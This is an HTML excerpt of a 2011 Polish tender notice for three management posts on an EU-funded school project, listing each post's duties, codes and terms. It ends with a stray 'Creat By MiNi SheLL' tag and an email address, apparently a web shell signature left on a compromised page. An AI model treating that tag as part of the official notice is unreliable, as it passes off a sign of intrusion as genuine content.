5. Zamawiający nie żąda od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy.
6. TERMIN WYKONANIA ZAMÓWIENIA - Od dnia zawarcia umowy do 31.07.2011 r., z zastrzeżeniem pkt. XXII ppkt. 6 lit e) SIWZ (dotyczy wszystkich części przedmiotu zamówienia).
7. Zamówienie jest podzielone na 3 (trzy) części:
część 1 pn. Kierownik Projektu;
część 2 pn. Koordynator ds. organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej;
część 3 pn. Koordynator ds.  sprawozdawczości finansowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierownik projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest powierzenie obowiązków Kierownika Projektu w Zespole Zarządzającym Projektem pn.: Dziś zdobywam wiedzę - jutro EUROPĘ współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty .Poddziałanie 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2)Do zakresu zadań i obowiązków Kierownika należeć będzie:

a.przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach;
b.terminowe i właściwe zrealizowanie projektu;
c.koordynowanie działań związanych z realizacją projektu;
d.kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu, wnioskiem aplikacyjnym oraz obowiązującymi w tym zakresie przepisami krajowymi i Unii Europejskiej;
e.nadzór nad całością prac związanych z realizacją projektu i ich jakością;
f.nadzór nad harmonogramem realizacji projektu, zawartym we wniosku o dofinansowanie ww. projektu;
g.prowadzenie Biura Projektu;
h.nadzór nad budżetem projektu, wynikającym z wniosku o dofinansowanie ww. projektu;
i.nadzór nad osiągnięciem rezultatów - twardych oraz miękkich - przedsięwzięcia, wyznaczonych ww. wniosku;
j.nadzorowanie bieżących postępów w realizacji projektu - weryfikacja danych monitoringowych przedstawianych przez Koordynatora ds. organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej;
k.koordynowanie i nadzór nad pracą Zespołu Zarządzającego Projektem - ponosi odpowiedzialność za całokształt zadań realizowanych przez Zespół zapewniając sprawne oraz prawidłowe funkcjonowanie i realizowanie projektu;
l.dokonywanie podziału obowiązków pomiędzy członków Zespołu Zarządzającego Projektem -zgodnie z zawartymi umowami Zespołu Zarządzającego z Zamawiającym;
m.nadzór nad całością prac związanych z realizacją i jakością szkoleń nt. Równość szans i prelekcji nt. zagadnień dotyczących szans jakie daje Unia Europejska edukacji w ramach konferencji;
n.bieżąca współpraca z Instytucją Pośredniczącą oraz Powiatem skarżyskim polegająca na wyjaśnianiu i konsultowaniu bieżących kwestii problemowych, wprowadzanie zmian we wniosku o dofinansowanie, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy o dofinansowanie projektu, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
o.informowanie na bieżąco Instytucji Pośredniczącej o zaistniałych nieprawidłowościach i podjętych środkach zaradczych w trakcie realizacji projektu;
p.poddanie się kontroli prowadzonej przez organy wewnętrzne oraz instytucje zewnętrzne w zakresie realizacji projektu; 
q.obecność oraz odpowiedzialność za projekt podczas jego kontroli;
r. udział w rekrutacji uczestników na zajęcia pozalekcyjne.
3) Wszelkie działania winny być zgodne z wymogami programu PO KL (Program Operacyjny Kapitał Ludzki) oraz zakresem czynności określonym w ust. 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest powierzenie obowiązków koordynatora d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej w Zespole Zarządzającym Projektem pn.: Dziś zdobywam wiedzę - jutro EUROPĘ współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty .Poddziałanie 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
2) Do zakresu zadań i obowiązków koordynatora ds. organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej w ramach umowy należeć będzie:
a.bieżąca realizacja projektu, harmonogramu zajęć;
b. udział w rekrutacji uczestników projektu;
c.nadzór nad organizacją i realizacją zajęć dla BO;
d.współudział w dostosowaniu programu szkoleń do potrzeb uczestników, w ramach projektu;
e.dbanie o jakość materiałów dydaktycznych;
f.nadzorowanie harmonogramu realizacji zajęć pozalekcyjnych;
g.przygotowanie narzędzi monitoringu zgodnie z wytycznymi w PO KL oraz zapisami wniosku aplikacyjnego (dzienniki zajęć, kwestionariusze osobowe,  umowy z uczestnikami projektu wraz z danymi oraz oświadczeniami uczestników i rodziców do przetwarzania danych osobowych, zestawienie wydanych certyfikatów, listy obecności, oświadczenia o rezygnacji ze szkoleń);
h.prowadzenie sprawozdawczości zgodnie z Zasadami systemu sprawozdawczości Programu Operacyjnego Kapitał Ludzki oraz z wnioskiem o dofinansowanie; 
i.przygotowywanie części merytorycznej wniosku o płatność; 
j.nadzorowanie przebiegu szkoleń; 
k. współpraca z pracownikami Zespołu Zarządzającego Projektem oraz ponoszenie odpowiedzialności za całokształt zadań wynikających z zakresu zadań i obowiązków należących do Koordynator d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej, zapewniających sprawne oraz prawidłowe funkcjonowanie i realizowanie projektu;
a.wykonywanie powierzonych przez Kierownika obowiązków związanych z realizacją projektu;
b.informowanie na bieżąco Kierownika o zaistniałych nieprawidłowościach w realizacji projektu w zakresie należącym do Koordynator d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej.
c.przygotowywanie comiesięcznych raportów z realizacji rzeczowej projektu dla Kierownika projektu 
d.poddanie się kontroli prowadzonej przez organy wewnętrzne oraz instytucje zewnętrzne w zakresie realizacji projektu;
e.obecność oraz odpowiedzialność w zakresie obowiązków koordynatora d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej podczas kontroli projektu.
3) Wszelkie działania winny być zgodne z wymogami programu PO KL (Program Operacyjny Kapitał Ludzki) oraz zakresem czynności określonym w ust. 2...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koordynator d/s sprawozdawczości finansowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest powierzenie obowiązków koordynatora d/s sprawozdawczości finansowej  w Zespole Zarządzającym Projektem pn.: Dziś zdobywam wiedzę - jutro EUROPĘ współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty .Poddziałanie 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych
2) Do zakresu zadań i obowiązków koordynatora d/s sprawozdawczości finansowej w ramach umowy należeć będzie:

a.realizowanie harmonogramu płatności projektu w zakresie należącym do  Koordynatora ds. sprawozdawczości finansowej.
b.rzetelne i terminowe sporządzanie wniosków o płatność wraz z zebraniem wszystkich załączników, w tym również sporządzenie ostatniego wniosku o płatność;
c.kontrola wydatkowania środków zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej;
d.przygotowywanie oraz analiza zestawień wydatków;
e.przygotowywanie dokumentów do realizacji płatności;
f.przygotowanie umów dla pracowników;
g.realizacja działań związanych z promocją wynikających z Zadania nr 1 Zarządzanie, promocja, rekrutacja. m. in. przygotowanie umów z Wykonawcami usług informacyjno - promocyjnych, dystrybucja materiałów promocyjnych, przygotowywanie informacji do umieszczenia na podstronie www, itp.;
a.realizacja całości prac związanych z rozliczeniem finansowym oraz promocją projektu;
i) współpraca z pracownikami Zespołu Zarządzającego Projektem oraz ponoszenie odpowiedzialności za całokształt zadań wynikających z zakresu zadań i obowiązków należących do Koordynatora ds. sprawozdawczości finansowej zapewniających sprawne oraz prawidłowe funkcjonowanie i realizowanie projektu; 
b.wykonywanie powierzonych przez Kierownika obowiązków związanych z realizacją projektu:
c.informowanie na bieżąco Kierownika o zaistniałych nieprawidłowościach w realizacji projektu w zakresie należącym do Koordynatora ds. sprawozdawczości finansowej;
d.przygotowywanie comiesięcznych raportów z realizacji finansowej projektu dla Kierownika projektu ; 
e.poddanie się kontroli prowadzonej przez organy wewnętrzne oraz instytucje zewnętrzne w zakresie realizacji projektu;
f.obecność oraz odpowiedzialność w zakresie obowiązków Koordynatora ds. sprawozdawczości finansowej podczas kontroli projektu;
g.śledzenie zmian w przepisach , ustawach min, dotyczących sytemu sprawozdawczości merytorycznej i finansowej .

3) Wszelkie działania winny być zgodne z wymogami programu PO KL (Program Operacyjny Kapitał Ludzki) oraz zakresem czynności określonym w ust. 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com